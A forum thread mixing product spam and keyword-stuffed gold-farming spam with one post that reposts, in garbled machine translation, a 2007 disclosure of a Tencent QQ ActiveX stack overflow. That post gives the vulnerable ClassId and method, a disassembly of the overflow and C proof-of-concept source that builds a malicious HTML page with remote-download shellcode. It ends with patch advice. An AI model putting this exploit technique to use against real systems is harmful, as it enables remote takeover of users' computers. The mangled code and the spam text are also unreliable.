Old 03-23-2011, 09:27 PM   #1
guoady7o
Sergeant
 
Join Date: Feb 2011
Posts: 65
guoady7o is on a distinguished road
Default Calvin Klein Outerwear sizing-jimmy choo patent le

,Draped jersey dress
Jimmy Choo Private Strappy Black Patent Leather Designer High Heel Sandal brought to you from the Jimmy Choo Designer High Heel Collection. Jimmy Choo Private Strappy Black Patent Leather Designer High Heel Sandal cutout shoes with a heel that measures approximately 5.5″inches and a 0.7″ inch platform. It has a beige interior,Calvin Klein Outerwear sizing, an open toe and a zip fastening on back.
These are the perfect camouflage shoes to blend in with your legs. And if you prefer your heels in classic & clearly visible colors,Calvin Klein Jeans shape, these are also available in black patentls. Jimmy Choo 'Private' Cuff Patent Leather Sandal :High-gloss patent leather is shaped into a modern sandal with a sculpted cuff and narrow wrapped heel. Nude patent-leather sandals with a wide double strap and a heel that measures approximately 120mm / 4.5 inches with a 10mm / 0.5 inch platform.
Jimmy Choo’s glossy black patent-leather sandals are a fabulous wear-anywhere style. These shoes are part of the Jimmy Choo 24:7 capsule collection of best-sellers and classic styles that every woman should own.
guoady7o is offline   Reply With Quote

Old 03-24-2011, 02:50 AM   #3
g6jyu6ef
Major General
 
Join Date: Mar 2011
Posts: 987
g6jyu6ef is on a distinguished road
Default

February 23, 2007, 21:41 | Category: Personal Diary
QQ, developed by Tencent, is an IM software with a very wide range of users in China. DSW Avert 200612.31 found several 0day vulnerabilities in QQ and informed QQ officially. QQ was upgraded on 2007.1.1. In fact, before this, axis of Phantom Brigade (ph4nt0m) had already discovered these vulnerabilities but for some reason had not released them. The vulnerabilities are now public, so the details and the POC are announced as follows:
These QQ vulnerabilities are caused by ActiveX controls. The related DLLs are: VQQPLAYER.OCX, VQQsdl.dll, V2MailActiveX.ocx
Successful use of one of them makes it possible to remotely control the user's computer; because it is ActiveX, the user only needs to have QQ installed, even without the registry, for it to be used successfully.
Several other vulnerabilities are denial of service vulnerabilities, unenforceable, and will not be covered.
Affected version:
Tencent QQ2006 official version and all previous versions. (2007.1.1 patch does not update)
Details:
In VQQPLAYER.OCX, because of programmer carelessness, there is a stack overflow; when the function returns, you can control the EIP.
The method in which the vulnerability exists is LaunchP2PShare,
ClassId is {AC3A36A8-9BFF-410A-A33D-2279FFEB69D2}
Its prototype is:
[id (0x00000030)]
VARIANT_BOOL LaunchP2PShare (
BSTR szExeName,
long nDuration);
The length of the first parameter is not checked; a long string will cause a stack overflow.
Phantom Brigade will release a POC code for this, do not use this as an illegal
POC:
----------------------------------------------- -----------------------------------------
/ *
*---------------------------------------------- -------------------------
*
* Tencent QQ VQQPlayer.ocx (all version) 0day
*
*
* Author: axis
* Date: 2006-12-27
* Mail: axis@ph4nt0m.org
*
* Bug discovered by axis@ph4nt0m.org
*:
*:
*:
*:
*: Usage: filename [htmlfile]
*: filename.exe localhtml.htm
*
* VQQPlayer.ocx the LaunchP2PShare function in the first argument does not do bounds checking, extended to cover the eip and seh MFC42.dll
* QQ is vc6 compiler, so you can overwrite the return address using the method, but requires coverage is visible before eip and character requirements are relatively harsh
* and overwrite the return address of the Method, and QQ on the installation path, because this is covered from the c: program files encentqqAAAAA ....
Comparison of coverage seh
* general, the use of heap spray method, skip 0x0c0c0c0c execution in shellcode, but it will shut down ie.
*
*
*
*
04534E5F 55 PUSH EBP
04534E60 8BEC MOV EBP, ESP
04534E62 81EC 60060000 SUB ESP, 660
04534E68 53 PUSH EBX
04534E69 33DB XOR EBX, EBX
04534E6B 395D 08 CMP DWORD PTR SS: [EBP +8], EBX
04534E6E 56 PUSH ESI
04534E6F 57 PUSH EDI
04534E70 8BF1 MOV ESI, ECX
04534E72 75 11 JNZ SHORT VQQPLA ~ 1.04534E85
04534E74 C786 8C040000 1> MOV DWORD PTR DS: [ESI +48 C], 12
04534E7E 33C0 XOR EAX, EAX
04534E80 E9 42010000 JMP VQQPLA ~ 1.04534FC7
04534E85 8B45 0C MOV EAX, DWORD PTR SS: [EBP + C]
04534E88 3BC3 CMP EAX, EBX
04534E8A 8945 0C MOV DWORD PTR SS: [EBP + C], EAX
04534E8D 7F 07 JG SHORT VQQPLA ~ 1.04534E96
04534E8F C745 0C 0A00000> MOV DWORD PTR SS: [EBP + C], 0A
04534E96 BF 04010000 MOV EDI, 104
04534E9B 8D85 A0FDFFFF LEA EAX, DWORD PTR SS: [EBP-260]
04534EA1 57 PUSH EDI
04534EA2 53 PUSH EBX
04534EA3 50 PUSH EAX
04534EA4 E8 437F0000 CALL
04534EA9 57 PUSH EDI
04534EAA 8D85 A4FEFFFF LEA EAX, DWORD PTR SS: [EBP-15C]
04534EB0 53 PUSH EBX
04534EB1 50 PUSH EAX
04534EB2 E8 357F0000 CALL
04534EB7 83C4 18 ADD ESP, 18
04534EBA 897D FC MOV DWORD PTR SS: [EBP-4], EDI
04534EBD E8 6E780000 CALL
04534EC2 8B40 04 MOV EAX, DWORD PTR DS: [EAX +4]
04534EC5 8B78 6C MOV EDI, DWORD PTR DS: [EAX +6 C]
04534EC8 8D85 A4FEFFFF LEA EAX, DWORD PTR SS: [EBP-15C]
04534ECE 57 PUSH EDI
04534ECF 50 PUSH EAX
04534ED0 E8 C3250000 CALL VQQPLA ~ 1.04537498
04534ED5 FF75 08 PUSH DWORD PTR SS: [EBP +8]
04534ED8 8D85 A4FEFFFF LEA EAX, DWORD PTR SS: [EBP-15C]
04534EDE 50 PUSH EAX
04534EDF E8 027F0000 CALL; overflow
[ebp-15c] is that QQ installation directory, [ebp +8] is that the first parameter passed
shellcode using the add esp, 4dch
pop ebp
retn 24h
Security Exit to return to the upper function in mshtml.dll
*
*------------------------------------------ ------------------------------
* /
# i nclude
# i nclude
# i nclude
FILE * fp = NULL;
char * file = \
char * url = NULL;
/ / Download Shellcode by swan @ 0x557 bypass firewall
/ / added by axis @ ph4n0m balance recovery stack, ie not linked
unsigned char sc [] =
\
\
\
\
\
\
\
\
\
\
\
\
\
\
\
\
\
\
\
\
\
\
\
\
\
char * header =
\
\
\
\
char * trigger =
\
\
\
\
\
/ / print unicode shellcode
void PrintPayLoad (char * lpBuff, int buffsize)
{
int i;
for (i = 0; i {
if ((i% 16) == 0)
{
if (i! = 0)
{
printf (\
fprintf (fp, \
}
else
{
printf (\
fprintf (fp, \
}
}
printf (\
fprintf (fp, \
}
/ / print the header to the back shellcode, and then use \
printf (\
fprintf (fp, \
fflush (fp);
}
void main (int argc, char ** argv)
{
unsigned char buf [1024] = {0};
int sc_len = 0;
if (argc = 3) file = argv [2];
printf (\
fp = fopen (file, \
if (! fp)
{
printf (\
return;
}
/ / build evil html file
fprintf (fp, \
fflush (fp);
memset (buf, 0, sizeof (buf));
sc_len = sizeof (sc) -1;
memcpy (buf, sc, sc_len);
memcpy (buf + sc_len, url, strlen (url));
sc_len + = strlen (url) +1;
PrintPayLoad ((char *) buf, sc_len);
fprintf (fp, \
fflush (fp);
fprintf (fp, \
fflush (fp);
printf (\
}
----------------------------------------------- -----------------------------------------
Suggestions:
Prohibit IE from running ActiveX
Vendor patch:
2007.1.1
The vendor has now released an upgrade patch; users should upgrade QQ!
To upgrade, go to automatic updates in the QQ system settings and click the check for the latest upgrade.
g6jyu6ef is offline   Reply With Quote
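The unchecked-length pattern described in the post above, modelled in C beside a bounds-checked version. This is an added example, not code from the post or from Tencent: the function names, the `char` argument (the real method takes a BSTR) and the install-directory string are assumptions, and only the 0x104 buffer size comes from the listing.

```c
#include <stdio.h>
#include <string.h>

#define PATH_BUF 0x104 /* size the listing passes when zeroing [EBP-15C] */

/* Constructed stand-in for the QQ installation directory. */
static const char INSTALL_DIR[] = "C:\\Program Files\\Tencent\\QQ\\";

/* Pattern described in the post: directory copied into a fixed stack buffer,
 * caller-supplied name appended with no length check. For contrast only:
 * any exe_name longer than the remaining space writes past path[]. */
int launch_unchecked(const char *exe_name, char *out, size_t out_len)
{
    char path[PATH_BUF] = {0};
    strcpy(path, INSTALL_DIR);
    strcat(path, exe_name);
    snprintf(out, out_len, "%s", path);
    return 0;
}

/* Hardened form: measure the input with a bound, reject what does not fit. */
int launch_checked(const char *exe_name, char *out, size_t out_len)
{
    char path[PATH_BUF];
    const size_t dir_len = sizeof INSTALL_DIR - 1;
    size_t name_len;

    if (exe_name == NULL || out == NULL)
        return -1;
    /* Bounded length scan: never reads more than PATH_BUF bytes of input. */
    for (name_len = 0; name_len < PATH_BUF && exe_name[name_len]; name_len++)
        ;
    if (dir_len + name_len >= sizeof path || dir_len + name_len >= out_len)
        return -1;                       /* no room for the text plus NUL */
    memcpy(path, INSTALL_DIR, dir_len);
    memcpy(path + dir_len, exe_name, name_len);
    path[dir_len + name_len] = '\0';
    memcpy(out, path, dir_len + name_len + 1);
    return 0;
}

int main(void)
{
    char out[PATH_BUF];
    printf("short name: %d\n", launch_checked("share.exe", out, sizeof out));
    return 0;
}
```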
Old 03-24-2011, 03:37 AM   #4
defg216
Brigadier General
 
Join Date: Feb 2011
Posts: 882
defg216 is on a distinguished road
Red face Gentle then

Gentle then went to the wow gold afford his grip, and Stephen thespian nigh the window. The succession of buy wow gold sun had crept upwardly, edged off, and vanished; the zoophytes slept: a wow gold dusky semidarkness pervaded the people. And now another production of devolve shone over the wow power leveling window. 'There!' said Knight, 'where is there in England a ########up to close that? I sit wow accounts there and timepiece them every night before I go domicile. Gently afford the framework.'
defg216 is offline   Reply With Quote